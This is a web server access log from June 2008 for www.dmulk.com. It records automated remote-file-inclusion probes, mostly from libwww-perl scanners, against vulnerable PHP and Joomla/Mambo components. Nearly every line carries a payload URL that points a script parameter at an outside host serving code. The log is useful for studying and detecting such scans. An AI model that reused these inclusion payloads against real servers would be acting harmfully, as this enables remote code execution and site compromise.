209.62.80.134 - - [08/Jun/2008:11:29:54 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.62.80.134 - - [08/Jun/2008:11:29:54 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.52.177.153 - - [08/Jun/2008:11:29:54 -0700] "GET /logs/access_080106.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:30:00 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:11:30:13 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:11:30:15 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:11:30:15 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:30:37 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:30:37 -0700] "GET /phphtml.php?htmlclass_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:30:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.171.66.158 - - [08/Jun/2008:11:30:39 -0700] "GET /logs/access_080219.log//mcf.php?content=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.158 - - [08/Jun/2008:11:30:39 -0700] "GET /logs/access_080219.log//mcf.php?content=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.197.247 - - [08/Jun/2008:11:30:49 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
62.149.197.247 - - [08/Jun/2008:11:30:49 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:31:04 -0700] "GET /logs/access_080201.log/index.php?pagina=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:31:11 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.49.157 - - [08/Jun/2008:11:31:15 -0700] "GET /index.php?x=http://www.troop66nm.org/image/response1??? HTTP/1.1" 200 16819 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
190.54.49.157 - - [08/Jun/2008:11:31:16 -0700] "GET /logs/index.php?x=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:31:16 -0700] "GET /logs/access.log/index.php?pagina=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.237.236.11 - - [08/Jun/2008:11:31:27 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:31:33 -0700] "GET /pagina.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:31:33 -0700] "GET /logs/pagina.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:31:51 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:31:52 -0700] "GET /logs/myevent.php?myevent_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:31:52 -0700] "GET /myevent.php?myevent_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:32:21 -0700] "GET //mcf.php?content=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:32:34 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:32:43 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.10.251 - - [08/Jun/2008:11:32:45 -0700] "GET /logs//mcf.php?content=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Jun/2008:11:32:46 -0700] "GET //mcf.php?content=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:32:57 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:32:57 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:33:08 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:33:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:11:33:09 -0700] "GET /logs/access_080216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:33:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:33:20 -0700] "GET /logs//mcf.php?content=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:33:20 -0700] "GET //mcf.php?content=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.28.2 - - [08/Jun/2008:11:33:32 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.28.2 - - [08/Jun/2008:11:33:32 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.28.2 - - [08/Jun/2008:11:33:32 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.28.2 - - [08/Jun/2008:11:33:32 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.159.210 - - [08/Jun/2008:11:33:39 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:33:40 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.65.159.210 - - [08/Jun/2008:11:33:40 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:33:43 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:34:08 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:34:09 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.180.200.232 - - [08/Jun/2008:11:34:14 -0700] "GET /logs/access_080425.log/errors.php?error=http://www.hoogmartens.eu/universerox/r0x/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:34:15 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.180.200.232 - - [08/Jun/2008:11:34:17 -0700] "GET /logs/access_080513.log/errors.php?error=http://www.hoogmartens.eu/universerox/r0x/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:34:32 -0700] "GET //protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:34:33 -0700] "GET /logs/access_080216.log//config.php?path[docroot]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:34:34 -0700] "GET //config.php?path[docroot]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:34:34 -0700] "GET /logs//config.php?path[docroot]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:34:36 -0700] "GET /logs/access_080116.log//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:34:37 -0700] "GET //protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:34:37 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:34:39 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:34:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:34:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.20.64.34 - - [08/Jun/2008:11:34:44 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:34:45 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:34:45 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:34:45 -0700] "GET /phphtml.php?htmlclass_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:34:46 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:34:49 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16935 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:34:55 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:11:35:09 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:11:35:10 -0700] "GET //protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:35:10 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:35:23 -0700] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:35:23 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:35:23 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:35:26 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:35:27 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:35:28 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:35:44 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:35:53 -0700] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.156.192.5 - - [08/Jun/2008:11:36:09 -0700] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [08/Jun/2008:11:36:09 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.1.32.12 - - [08/Jun/2008:11:36:20 -0700] "GET /logs/access_080116.log//protection.php?action=logout&siteurl=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:11:36:25 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.1.32.12 - - [08/Jun/2008:11:36:26 -0700] "GET //protection.php?action=logout&siteurl=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.224.129.124 - - [08/Jun/2008:11:36:28 -0700] "GET /logs/access_080507.log//language.inc.php?langs_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [08/Jun/2008:11:36:28 -0700] "GET /logs//language.inc.php?langs_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:11:36:59 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [08/Jun/2008:11:37:16 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.53.114.42 - - [08/Jun/2008:11:37:34 -0700] "GET /logs/access.log//index.php?sayfa=http://www.symbols-larp.com/php/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [08/Jun/2008:11:37:36 -0700] "GET //index.php?sayfa=http://www.symbols-larp.com/php/alba.txt?? HTTP/1.1" 200 16839 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [08/Jun/2008:11:37:37 -0700] "GET /logs//index.php?sayfa=http://www.symbols-larp.com/php/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:37:44 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:37:45 -0700] "GET /logs/forum.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:37:45 -0700] "GET /forum.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:37:46 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:37:48 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.149.197.247 - - [08/Jun/2008:11:38:43 -0700] "GET //mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
62.149.197.247 - - [08/Jun/2008:11:38:44 -0700] "GET /logs//mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:38:52 -0700] "GET /logs/access.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:38:52 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:38:52 -0700] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.53.114.42 - - [08/Jun/2008:11:39:10 -0700] "GET //include.php?path[docroot]=http://www.symbols-larp.com/php/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.1.32.12 - - [08/Jun/2008:11:39:29 -0700] "GET /logs//protection.php?action=logout&siteurl=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [08/Jun/2008:11:39:30 -0700] "GET //protection.php?action=logout&siteurl=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
212.145.146.10 - - [08/Jun/2008:11:39:32 -0700] "GET /logs/phphtml.php?htmlclass_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.145.146.10 - - [08/Jun/2008:11:39:33 -0700] "GET /phphtml.php?htmlclass_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:39:38 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:39:38 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:39:38 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:11:39:56 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:11:39:56 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:40:12 -0700] "GET //skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:40:27 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:40:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.16.224.119 - - [08/Jun/2008:11:40:29 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [08/Jun/2008:11:40:29 -0700] "GET /phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:40:42 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:40:48 -0700] "GET /logs/shop.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
